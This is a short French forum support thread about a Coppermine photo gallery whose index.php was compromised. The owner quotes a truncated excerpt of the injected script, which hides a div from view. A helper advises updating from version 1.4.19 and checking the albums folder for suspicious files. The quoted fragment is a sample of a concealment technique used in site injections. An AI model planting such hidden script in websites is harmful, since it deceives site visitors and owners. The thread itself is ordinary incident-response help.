Print

[panatan]

Bonjour,

Je viens de découvrir qu'un code avait été injecté dans ma galerie, voici un extrait (le code est beaucoup plus long...

Code: [Select]

<div id='sihanw'><script>b='hid';c='den';d=0;a=document.getElementById('sihanw');if(a){a.style.position='absolute';a.style.height=d+'px';a.style.overflow=b+c;}  .....   etc .....</script><!--<</div>
Est-ce une faille connue et les maj permettent-t-elles de résoudre ce problème ?

Merci pour votre aide.

 

[François Keller]

il est difficile de dire si le code vient d'une faille récente ou non de coppermine avec le peu d'indications que nous sont données.
Quelle version de coppermine utilisez vous
le code se trouve dans quels fichiers ?
Y at'il beaucoup de fichiers concernés.
Mais de toute façon, une mise à jour s'impose puisqu'a chaque fois elle permets de corriger des failles de sécurités découvertes...

[panatan]

Je crois qu'il s'agit de l'avant dernière version (pas sûr car je n'arrive plus à me connecter à l'admin...)

Le code n'a été ajouté qu'au niveau de l'index.php

[François Keller]

si le site est celui qui est accessible depuis l'icone de ton profil, il est en version 1.4.19. (pas besoin d'accéder à l'administration pour le voir)
Il est indispensable de faire une mise à jour et de vérifier qu'il n'y a pas de fichier avec un  nom bizarre dans le répertoire albums.

[panatan]

Faille connue ?